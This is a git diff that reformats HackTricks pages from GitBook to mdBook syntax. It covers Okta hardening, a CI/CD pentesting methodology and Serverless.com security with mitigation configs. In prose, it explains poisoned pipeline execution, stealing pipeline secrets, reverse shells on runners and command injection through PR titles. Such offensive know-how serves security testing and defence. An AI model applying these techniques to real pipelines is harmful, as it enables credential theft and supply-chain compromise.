It's recommended to request MFA, limit the session lifetime to some hours, don't persis session cookies across browser extensions and limit the location and Identity Provider (if this is possible). For example, if every user should be login from a country you could only allow this location. @@ -161,9 +148,9 @@ From an attackers perspective it's interesting to know which Ps are allowed (and ### Device Integrations -* **Endpoint Management**: Endpoint management is a condition that can be applied in an authentication policy to ensure that managed devices have access to an application. - * I haven't seen this used yet. TODO -* **Notification services**: I haven't seen this used yet. TODO +- **Endpoint Management**: Endpoint management is a condition that can be applied in an authentication policy to ensure that managed devices have access to an application. + - I haven't seen this used yet. TODO +- **Notification services**: I haven't seen this used yet. TODO ### API @@ -209,17 +196,4 @@ Here you can find **generic information** about the Okta environment, such as th Here you can download Okta agents to sync Okta with other technologies. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/pentesting-ci-cd-methodology.md b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md similarity index 55% rename from pentesting-ci-cd/pentesting-ci-cd-methodology.md rename to src/pentesting-ci-cd/pentesting-ci-cd-methodology.md index 58cde5a81..1fb5c1428 100644 --- a/pentesting-ci-cd/pentesting-ci-cd-methodology.md +++ b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md @@ -1,31 +1,18 @@ # Pentesting CI/CD Methodology -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +{{#include ../banners/hacktricks-training.md}} -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -
+
## VCS VCS stands for **Version Control System**, this systems allows developers to **manage their source code**. The most common one is **git** and you will usually find companies using it in one of the following **platforms**: -* Github -* Gitlab -* Bitbucket -* Gitea -* Cloud providers (they offer their own VCS platforms) +- Github +- Gitlab +- Bitbucket +- Gitea +- Cloud providers (they offer their own VCS platforms) ## CI/CD Pipelines 
@@ -35,24 +22,23 @@ However, these systems need to be **executed somewhere** and usually with **priv ## VCS Pentesting Methodology -{% hint style="info" %} -Even if some VCS platforms allow to create pipelines for this section we are going to analyze only potential attacks to the control of the source code. -{% endhint %} +> [!NOTE] +> Even if some VCS platforms allow to create pipelines for this section we are going to analyze only potential attacks to the control of the source code. Platforms that contains the source code of your project contains sensitive information and people need to be very careful with the permissions granted inside this platform. These are some common problems across VCS platforms that attacker could abuse: -* **Leaks**: If your code contains leaks in the commits and the attacker can access the repo (because it's public or because he has access), he could discover the leaks. -* **Access**: If an attacker can **access to an account inside the VCS platform** he could gain **more visibility and permissions**. - * **Register**: Some platforms will just allow external users to create an account. - * **SSO**: Some platforms won't allow users to register, but will allow anyone to access with a valid SSO (so an attacker could use his github account to enter for example). - * **Credentials**: Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... there are several kind of tokens a user could steal to access in some way a repo. -* **Webhooks**: VCS platforms allow to generate webhooks. If they are **not protected** with non visible secrets an **attacker could abuse them**. - * If no secret is in place, the attacker could abuse the webhook of the third party platform - * If the secret is in the URL, the same happens and the attacker also have the secret -* **Code compromise:** If a malicious actor has some kind of **write** access over the repos, he could try to **inject malicious code**. 
In order to be successful he might need to **bypass branch protections**. These actions can be performed with different goals in mid: - * Compromise the main branch to **compromise production**. - * Compromise the main (or other branches) to **compromise developers machines** (as they usually execute test, terraform or other things inside the repo in their machines). - * **Compromise the pipeline** (check next section) +- **Leaks**: If your code contains leaks in the commits and the attacker can access the repo (because it's public or because he has access), he could discover the leaks. +- **Access**: If an attacker can **access to an account inside the VCS platform** he could gain **more visibility and permissions**. + - **Register**: Some platforms will just allow external users to create an account. + - **SSO**: Some platforms won't allow users to register, but will allow anyone to access with a valid SSO (so an attacker could use his github account to enter for example). + - **Credentials**: Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... there are several kind of tokens a user could steal to access in some way a repo. +- **Webhooks**: VCS platforms allow to generate webhooks. If they are **not protected** with non visible secrets an **attacker could abuse them**. + - If no secret is in place, the attacker could abuse the webhook of the third party platform + - If the secret is in the URL, the same happens and the attacker also have the secret +- **Code compromise:** If a malicious actor has some kind of **write** access over the repos, he could try to **inject malicious code**. In order to be successful he might need to **bypass branch protections**. These actions can be performed with different goals in mid: + - Compromise the main branch to **compromise production**. + - Compromise the main (or other branches) to **compromise developers machines** (as they usually execute test, terraform or other things inside the repo in their machines). 
+ - **Compromise the pipeline** (check next section) ## Pipelines Pentesting Methodology 
@@ -67,36 +53,36 @@ The Poisoned Pipeline Execution (PPE) path exploits permissions in an SCM reposi For a malicious actor to be successful performing a PPE attack he needs to be able to: -* Have **write access to the VCS platform**, as usually pipelines are triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access). - * Note that sometimes an **external PR count as "write access"**. -* Even if he has write permissions, he needs to be sure he can **modify the CI config file or other files the config is relying on**. - * For this, he might need to be able to **bypass branch protections**. +- Have **write access to the VCS platform**, as usually pipelines are triggered when a push or a pull request is performed. (Check the VCS pentesting methodology for a summary of ways to get access). + - Note that sometimes an **external PR count as "write access"**. +- Even if he has write permissions, he needs to be sure he can **modify the CI config file or other files the config is relying on**. + - For this, he might need to be able to **bypass branch protections**. There are 3 PPE flavours: -* **D-PPE**: A **Direct PPE** attack occurs when the actor **modifies the CI config** file that is going to be executed. -* **I-DDE**: An **Indirect PPE** attack occurs when the actor **modifies** a **file** the CI config file that is going to be executed **relays on** (like a make file or a terraform config). -* **Public PPE or 3PE**: In some cases the pipelines can be **triggered by users that doesn't have write access in the repo** (and that might not even be part of the org) because they can send a PR. - * **3PE Command Injection**: Usually, CI/CD pipelines will **set environment variables** with **information about the PR**. 
If that value can be controlled by an attacker (like the title of the PR) and is **used** in a **dangerous place** (like executing **sh commands**), an attacker might **inject commands in there**. +- **D-PPE**: A **Direct PPE** attack occurs when the actor **modifies the CI config** file that is going to be executed. +- **I-DDE**: An **Indirect PPE** attack occurs when the actor **modifies** a **file** the CI config file that is going to be executed **relays on** (like a make file or a terraform config). +- **Public PPE or 3PE**: In some cases the pipelines can be **triggered by users that doesn't have write access in the repo** (and that might not even be part of the org) because they can send a PR. + - **3PE Command Injection**: Usually, CI/CD pipelines will **set environment variables** with **information about the PR**. If that value can be controlled by an attacker (like the title of the PR) and is **used** in a **dangerous place** (like executing **sh commands**), an attacker might **inject commands in there**. ### Exploitation Benefits Knowing the 3 flavours to poison a pipeline, lets check what an attacker could obtain after a successful exploitation: -* **Secrets**: As it was mentioned previously, pipelines require **privileges** for their jobs (retrieve the code, build it, deploy it...) and this privileges are usually **granted in secrets**. These secrets are usually accessible via **env variables or files inside the system**. Therefore an attacker will always try to exfiltrate as much secrets as possible. - * Depending on the pipeline platform the attacker **might need to specify the secrets in the config**. This means that is the attacker cannot modify the CI configuration pipeline (**I-PPE** for example), he could **only exfiltrate the secrets that pipeline has**. -* **Computation**: The code is executed somewhere, depending on where is executed an attacker might be able to pivot further. 
- * **On-Premises**: If the pipelines are executed on premises, an attacker might end in an **internal network with access to more resources**. - * **Cloud**: The attacker could access **other machines in the cloud** but also could **exfiltrate** IAM roles/service accounts **tokens** from it to obtain **further access inside the cloud**. - * **Platforms machine**: Sometimes the jobs will be execute inside the **pipelines platform machines**, which usually are inside a cloud with **no more access**. - * **Select it:** Sometimes the **pipelines platform will have configured several machines** and if you can **modify the CI configuration file** you can **indicate where you want to run the malicious code**. In this situation, an attacker will probably run a reverse shell on each possible machine to try to exploit it further. -* **Compromise production**: If you ware inside the pipeline and the final version is built and deployed from it, you could **compromise the code that is going to end running in production**. +- **Secrets**: As it was mentioned previously, pipelines require **privileges** for their jobs (retrieve the code, build it, deploy it...) and this privileges are usually **granted in secrets**. These secrets are usually accessible via **env variables or files inside the system**. Therefore an attacker will always try to exfiltrate as much secrets as possible. + - Depending on the pipeline platform the attacker **might need to specify the secrets in the config**. This means that is the attacker cannot modify the CI configuration pipeline (**I-PPE** for example), he could **only exfiltrate the secrets that pipeline has**. +- **Computation**: The code is executed somewhere, depending on where is executed an attacker might be able to pivot further. + - **On-Premises**: If the pipelines are executed on premises, an attacker might end in an **internal network with access to more resources**. 
+ - **Cloud**: The attacker could access **other machines in the cloud** but also could **exfiltrate** IAM roles/service accounts **tokens** from it to obtain **further access inside the cloud**. + - **Platforms machine**: Sometimes the jobs will be execute inside the **pipelines platform machines**, which usually are inside a cloud with **no more access**. + - **Select it:** Sometimes the **pipelines platform will have configured several machines** and if you can **modify the CI configuration file** you can **indicate where you want to run the malicious code**. In this situation, an attacker will probably run a reverse shell on each possible machine to try to exploit it further. +- **Compromise production**: If you ware inside the pipeline and the final version is built and deployed from it, you could **compromise the code that is going to end running in production**. ## More relevant info ### Tools & CIS Benchmark -* [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is an open-source tool for auditing your software supply chain stack for security compliance based on a new [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time. +- [**Chain-bench**](https://github.com/aquasecurity/chain-bench) is an open-source tool for auditing your software supply chain stack for security compliance based on a new [**CIS Software Supply Chain benchmark**](https://github.com/aquasecurity/chain-bench/blob/main/docs/CIS-Software-Supply-Chain-Security-Guide-v1.0.pdf). The auditing focuses on the entire SDLC process, where it can reveal risks from code time into deploy time. ### Top 10 CI/CD Security Risk 
@@ -104,28 +90,15 @@ Check this interesting article about the top 10 CI/CD risks according to Cider: ### Labs -* On each platform that you can run locally you will find how to launch it locally so you can configure it as you want to test it -* Gitea + Jenkins lab: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat) +- On each platform that you can run locally you will find how to launch it locally so you can configure it as you want to test it +- Gitea + Jenkins lab: [https://github.com/cider-security-research/cicd-goat](https://github.com/cider-security-research/cicd-goat) ### Automatic Tools -* [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is a static code analysis tool for infrastructure-as-code. +- [**Checkov**](https://github.com/bridgecrewio/checkov): **Checkov** is a static code analysis tool for infrastructure-as-code. ## References -* [https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm\_source=github\&utm\_medium=github\_page\&utm\_campaign=ci%2fcd%20goat\_060422](https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github\&utm_medium=github_page\&utm_campaign=ci%2fcd%20goat_060422) +- [https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github\&utm_medium=github_page\&utm_campaign=ci%2fcd%20goat_060422](https://www.cidersecurity.io/blog/research/ppe-poisoned-pipeline-execution/?utm_source=github&utm_medium=github_page&utm_campaign=ci%2fcd%20goat_060422) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} diff --git a/pentesting-ci-cd/serverless.com-security.md b/src/pentesting-ci-cd/serverless.com-security.md similarity index 64% rename from pentesting-ci-cd/serverless.com-security.md rename to src/pentesting-ci-cd/serverless.com-security.md index 5d61c2b1c..007bf5cc6 100644 --- a/pentesting-ci-cd/serverless.com-security.md +++ b/src/pentesting-ci-cd/serverless.com-security.md @@ -1,19 +1,6 @@ # Serverless.com Security -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../banners/hacktricks-training.md}} ## Basic Information @@ -190,23 +177,23 @@ functions: **Variables** enable dynamic configuration by allowing the use of placeholders that are resolved at deployment time. -* **Syntax:** `${variable}` syntax can reference environment variables, file contents, or other configuration parameters. +- **Syntax:** `${variable}` syntax can reference environment variables, file contents, or other configuration parameters. - ```yaml - functions: - hello: - handler: handler.hello - environment: - TABLE_NAME: ${self:custom.tableName} - ``` + ```yaml + functions: + hello: + handler: handler.hello + environment: + TABLE_NAME: ${self:custom.tableName} + ``` -- **Custom Variables:** The `custom` section is used to define user-specific variables and configurations that can be reused throughout the `serverless.yml`. +* **Custom Variables:** The `custom` section is used to define user-specific variables and configurations that can be reused throughout the `serverless.yml`. - ```yaml - custom: - tableName: my-dynamodb-table - stage: ${opt:stage, 'dev'} - ``` + ```yaml + custom: + tableName: my-dynamodb-table + stage: ${opt:stage, 'dev'} + ```
@@ -329,8 +316,9 @@ serverless #Choose first one (AWS / Node.js / HTTP API) This should have created an **app** called `tutorialapp` that you can check in [serverless.com](serverless.com-security.md) and a folder called `Tutorial` with the file **`handler.js`** containing some JS code with a `helloworld` code and the file **`serverless.yml`** declaring that function: -{% tabs %} -{% tab title="handler.js" %} +{{#tabs }} +{{#tab name="handler.js" }} + ```javascript exports.hello = async (event) => { return { @@ -338,12 +326,13 @@ exports.hello = async (event) => { body: JSON.stringify({ message: "Go Serverless v4! Your function executed successfully!", }), - }; -}; + } +} ``` -{% endtab %} -{% tab title="serverless.yml" %} +{{#endtab }} +{{#tab name="serverless.yml" }} + ```yaml # "org" ensures this Service is used with the correct Serverless Framework Access Key. org: testing12342 @@ -364,8 +353,9 @@ functions: path: / method: get ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} 4. Create an AWS provider, going in the **dashboard** in `https://app.serverless.com//settings/providers?providerId=new&provider=aws`. 1. To give `serverless.com` access to AWS It will ask to run a cloudformation stack using this config file (at the time of this writing): [https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml) @@ -382,7 +372,7 @@ Resources: Type: AWS::IAM::Role Properties: AssumeRolePolicyDocument: - Version: '2012-10-17' + Version: "2012-10-17" Statement: - Effect: Allow Principal: @@ -391,7 +381,7 @@ Resources: - sts:AssumeRole Condition: StringEquals: - sts:ExternalId: !Sub 'ServerlessFramework-${OrgUid}' + sts:ExternalId: !Sub "ServerlessFramework-${OrgUid}" Path: / RoleName: !Ref RoleName ManagedPolicyArns: 
@@ -399,13 +389,13 @@ Resources: ReporterFunction: Type: Custom::ServerlessFrameworkReporter Properties: - ServiceToken: 'arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec' + ServiceToken: "arn:aws:lambda:us-east-1:486128539022:function:sp-providers-stack-reporter-custom-resource-prod-tmen2ec" OrgUid: !Ref OrgUid RoleArn: !GetAtt SFRole.Arn Alias: !Ref Alias Outputs: SFRoleArn: - Description: 'ARN for the IAM Role used by Serverless Framework' + Description: "ARN for the IAM Role used by Serverless Framework" Value: !GetAtt SFRole.Arn Parameters: OrgUid: @@ -427,21 +417,21 @@ Parameters: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::486128539022:root" - }, - "Action": "sts:AssumeRole", - "Condition": { - "StringEquals": { - "sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb" - } - } + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::486128539022:root" + }, + "Action": "sts:AssumeRole", + "Condition": { + "StringEquals": { + "sts:ExternalId": "ServerlessFramework-7bf7ddef-e1bf-43eb-a111-4d43e0894ccb" } - ] + } + } + ] } ``` 
@@ -449,13 +439,14 @@ Parameters: 5. The tutorial asks to create the file `createCustomer.js` which will basically create a new API endpoint handled by the new JS file and asks to modify the `serverless.yml` file to make it generate a **new DynamoDB table**, define an **environment variable**, the role that will be using the generated lambdas. -{% tabs %} -{% tab title="createCustomer.js" %} +{{#tabs }} +{{#tab name="createCustomer.js" }} + ```javascript -'use strict' -const AWS = require('aws-sdk') +"use strict" +const AWS = require("aws-sdk") module.exports.createCustomer = async (event) => { - const body = JSON.parse(Buffer.from(event.body, 'base64').toString()) + const body = JSON.parse(Buffer.from(event.body, "base64").toString()) const dynamoDb = new AWS.DynamoDB.DocumentClient() const putParams = { TableName: process.env.DYNAMODB_CUSTOMER_TABLE, @@ -470,9 +461,11 @@ module.exports.createCustomer = async (event) => { } } ``` -{% endtab %} -{% tab title="serverless.yml" %} +{{#endtab }} + +{{#tab name="serverless.yml" }} + ```yaml # "org" ensures this Service is used with the correct Serverless Framework Access Key. org: testing12342 @@ -489,13 +482,13 @@ provider: iam: role: statements: - - Effect: 'Allow' + - Effect: "Allow" Action: - - 'dynamodb:PutItem' - - 'dynamodb:Get*' - - 'dynamodb:Scan*' - - 'dynamodb:UpdateItem' - - 'dynamodb:DeleteItem' + - "dynamodb:PutItem" + - "dynamodb:Get*" + - "dynamodb:Scan*" + - "dynamodb:UpdateItem" + - "dynamodb:DeleteItem" Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} functions: @@ -526,8 +519,9 @@ resources: KeyType: HASH TableName: ${self:service}-customerTable-${sls:stage} ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} 6. Deploy it running **`serverless deploy`** 1. The deployment will be performed via a CloudFormation Stack 
@@ -549,58 +543,55 @@ When no permissions are specified for the a Lambda function, a role with permiss ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Action": [ - "logs:CreateLogStream", - "logs:CreateLogGroup", - "logs:TagResource" - ], - "Resource": [ - "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*" - ], - "Effect": "Allow" - }, - { - "Action": [ - "logs:PutLogEvents" - ], - "Resource": [ - "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*" - ], - "Effect": "Allow" - } - ] + "Version": "2012-10-17", + "Statement": [ + { + "Action": [ + "logs:CreateLogStream", + "logs:CreateLogGroup", + "logs:TagResource" + ], + "Resource": [ + "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*" + ], + "Effect": "Allow" + }, + { + "Action": ["logs:PutLogEvents"], + "Resource": [ + "arn:aws:logs:us-east-1:123456789012:log-group:/aws/lambda/jito-cranker-scripts-dev*:*:*" + ], + "Effect": "Allow" + } + ] } ``` - - #### **Mitigation Strategies** -* **Principle of Least Privilege:** Assign only necessary permissions to each function. +- **Principle of Least Privilege:** Assign only necessary permissions to each function. - ```yaml - provider: - [...] - iam: - role: - statements: - - Effect: 'Allow' - Action: - - 'dynamodb:PutItem' - - 'dynamodb:Get*' - - 'dynamodb:Scan*' - - 'dynamodb:UpdateItem' - - 'dynamodb:DeleteItem' - Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} - ``` -* **Use Separate Roles:** Differentiate roles based on function requirements. + ```yaml + provider: + [...] 
+ iam: + role: + statements: + - Effect: 'Allow' + Action: + - 'dynamodb:PutItem' + - 'dynamodb:Get*' + - 'dynamodb:Scan*' + - 'dynamodb:UpdateItem' + - 'dynamodb:DeleteItem' + Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-customerTable-${sls:stage} + ``` -*** +- **Use Separate Roles:** Differentiate roles based on function requirements. + +--- ### **Insecure Secrets and Configuration Management** @@ -608,9 +599,8 @@ Storing sensitive information (e.g., API keys, database credentials) directly in The **recommended** way to store environment variables in **`serverless.yml`** file from serverless.com (at the time of this writing) is to use the `ssm` or `s3` providers, which allows to get the **environment values from these sources at deployment time** and **configure** the **lambdas** environment variables with the **text clear of the values**! -{% hint style="danger" %} -Therefore, anyone with permissions to read the lambdas configuration inside AWS will be able to **access all these environment variables in clear text!** -{% endhint %} +> [!CAUTION] +> Therefore, anyone with permissions to read the lambdas configuration inside AWS will be able to **access all these environment variables in clear text!** For example, the following example will use SSM to get an environment variable: 
@@ -622,17 +612,16 @@ provider: And even if this prevents hardcoding the environment variable value in the **`serverless.yml`** file, the value will be obtained at deployment time and will be **added in clear text inside the lambda environment variable**. -{% hint style="success" %} -The recommended way to store environment variables using serveless.com would be to **store it in a AWS secret** and just store the secret name in the environment variable and the **lambda code should gather it**. -{% endhint %} +> [!TIP] +> The recommended way to store environment variables using serveless.com would be to **store it in a AWS secret** and just store the secret name in the environment variable and the **lambda code should gather it**. #### **Mitigation Strategies** -* **Secrets Manager Integration:** Use services like **AWS Secrets Manager.** -* **Encrypted Variables:** Leverage Serverless Framework’s encryption features for sensitive data. -* **Access Controls:** Restrict access to secrets based on roles. +- **Secrets Manager Integration:** Use services like **AWS Secrets Manager.** +- **Encrypted Variables:** Leverage Serverless Framework’s encryption features for sensitive data. +- **Access Controls:** Restrict access to secrets based on roles. -*** +--- ### **Vulnerable Code and Dependencies** 
@@ -640,18 +629,19 @@ Outdated or insecure dependencies can introduce vulnerabilities, while improper #### **Mitigation Strategies** -* **Dependency Management:** Regularly update dependencies and scan for vulnerabilities. +- **Dependency Management:** Regularly update dependencies and scan for vulnerabilities. - ```yaml - plugins: - - serverless-webpack - - serverless-plugin-snyk - ``` -* **Input Validation:** Implement strict validation and sanitization of all inputs. -* **Code Reviews:** Conduct thorough reviews to identify security flaws. -* **Static Analysis:** Use tools to detect vulnerabilities in the codebase. + ```yaml + plugins: + - serverless-webpack + - serverless-plugin-snyk + ``` -*** +- **Input Validation:** Implement strict validation and sanitization of all inputs. +- **Code Reviews:** Conduct thorough reviews to identify security flaws. +- **Static Analysis:** Use tools to detect vulnerabilities in the codebase. + +--- ### **Inadequate Logging and Monitoring** 
@@ -659,17 +649,18 @@ Without proper logging and monitoring, malicious activities may go undetected, d #### **Mitigation Strategies** -* **Centralized Logging:** Aggregate logs using services like **AWS CloudWatch** or **Datadog**. +- **Centralized Logging:** Aggregate logs using services like **AWS CloudWatch** or **Datadog**. - ```yaml - plugins: - - serverless-plugin-datadog - ``` -* **Enable Detailed Logging:** Capture essential information without exposing sensitive data. -* **Set Up Alerts:** Configure alerts for suspicious activities or anomalies. -* **Regular Monitoring:** Continuously monitor logs and metrics for potential security incidents. + ```yaml + plugins: + - serverless-plugin-datadog + ``` -*** +- **Enable Detailed Logging:** Capture essential information without exposing sensitive data. +- **Set Up Alerts:** Configure alerts for suspicious activities or anomalies. +- **Regular Monitoring:** Continuously monitor logs and metrics for potential security incidents. + +--- ### **Insecure API Gateway Configurations** 
@@ -677,45 +668,48 @@ Open or improperly secured APIs can be exploited for unauthorized access, Denial #### **Mitigation Strategies** -* **Authentication and Authorization:** Implement robust mechanisms like OAuth, API keys, or JWT. +- **Authentication and Authorization:** Implement robust mechanisms like OAuth, API keys, or JWT. - ```yaml - functions: - hello: - handler: handler.hello - events: - - http: - path: hello - method: get - authorizer: aws_iam - ``` -* **Rate Limiting and Throttling:** Prevent abuse by limiting request rates. + ```yaml + functions: + hello: + handler: handler.hello + events: + - http: + path: hello + method: get + authorizer: aws_iam + ``` - ```yaml - provider: - apiGateway: - throttle: - burstLimit: 200 - rateLimit: 100 - ``` -* **Secure CORS Configuration:** Restrict allowed origins, methods, and headers. +- **Rate Limiting and Throttling:** Prevent abuse by limiting request rates. - ```yaml - functions: - hello: - handler: handler.hello - events: - - http: - path: hello - method: get - cors: - origin: https://yourdomain.com - headers: - - Content-Type - ``` -* **Use Web Application Firewalls (WAF):** Filter and monitor HTTP requests for malicious patterns. + ```yaml + provider: + apiGateway: + throttle: + burstLimit: 200 + rateLimit: 100 + ``` -*** +- **Secure CORS Configuration:** Restrict allowed origins, methods, and headers. + + ```yaml + functions: + hello: + handler: handler.hello + events: + - http: + path: hello + method: get + cors: + origin: https://yourdomain.com + headers: + - Content-Type + ``` + +- **Use Web Application Firewalls (WAF):** Filter and monitor HTTP requests for malicious patterns. + +--- ### **Insufficient Function Isolation** 
@@ -723,21 +717,22 @@ Shared resources and inadequate isolation can lead to privilege escalations or u #### **Mitigation Strategies** -* **Isolate Functions:** Assign distinct resources and IAM roles to ensure independent operation. -* **Resource Partitioning:** Use separate databases or storage buckets for different functions. -* **Use VPCs:** Deploy functions within Virtual Private Clouds for enhanced network isolation. +- **Isolate Functions:** Assign distinct resources and IAM roles to ensure independent operation. +- **Resource Partitioning:** Use separate databases or storage buckets for different functions. +- **Use VPCs:** Deploy functions within Virtual Private Clouds for enhanced network isolation. - ```yaml - provider: - vpc: - securityGroupIds: - - sg-xxxxxxxx - subnetIds: - - subnet-xxxxxx - ``` -* **Limit Function Permissions:** Ensure functions cannot access or interfere with each other’s resources unless explicitly required. + ```yaml + provider: + vpc: + securityGroupIds: + - sg-xxxxxxxx + subnetIds: + - subnet-xxxxxx + ``` -*** +- **Limit Function Permissions:** Ensure functions cannot access or interfere with each other’s resources unless explicitly required. + +--- ### **Inadequate Data Protection** 
@@ -745,22 +740,23 @@ Unencrypted data at rest or in transit can be exposed, leading to data breaches #### **Mitigation Strategies** -* **Encrypt Data at Rest:** Utilize cloud service encryption features. +- **Encrypt Data at Rest:** Utilize cloud service encryption features. - ```yaml - resources: - Resources: - MyDynamoDBTable: - Type: AWS::DynamoDB::Table - Properties: - SSESpecification: - SSEEnabled: true - ``` -* **Encrypt Data in Transit:** Use HTTPS/TLS for all data transmissions. -* **Secure API Communication:** Enforce encryption protocols and validate certificates. -* **Manage Encryption Keys Securely:** Use managed key services and rotate keys regularly. + ```yaml + resources: + Resources: + MyDynamoDBTable: + Type: AWS::DynamoDB::Table + Properties: + SSESpecification: + SSEEnabled: true + ``` -*** +- **Encrypt Data in Transit:** Use HTTPS/TLS for all data transmissions. +- **Secure API Communication:** Enforce encryption protocols and validate certificates. +- **Manage Encryption Keys Securely:** Use managed key services and rotate keys regularly. + +--- ### **Lack of Proper Error Handling** 
@@ -768,26 +764,27 @@ Detailed error messages can leak sensitive information about the infrastructure #### **Mitigation Strategies** -* **Generic Error Messages:** Avoid exposing internal details in error responses. +- **Generic Error Messages:** Avoid exposing internal details in error responses. - ```javascript - javascriptCopy code// Example in Node.js - exports.hello = async (event) => { - try { - // Function logic - } catch (error) { - console.error(error); - return { - statusCode: 500, - body: JSON.stringify({ message: 'Internal Server Error' }), - }; - } - }; - ``` -* **Centralized Error Handling:** Manage and sanitize errors consistently across all functions. -* **Monitor and Log Errors:** Track and analyze errors internally without exposing details to end-users. + ```javascript + javascriptCopy code// Example in Node.js + exports.hello = async (event) => { + try { + // Function logic + } catch (error) { + console.error(error); + return { + statusCode: 500, + body: JSON.stringify({ message: 'Internal Server Error' }), + }; + } + }; + ``` -*** +- **Centralized Error Handling:** Manage and sanitize errors consistently across all functions. +- **Monitor and Log Errors:** Track and analyze errors internally without exposing details to end-users. + +--- ### **Insecure Deployment Practices** 
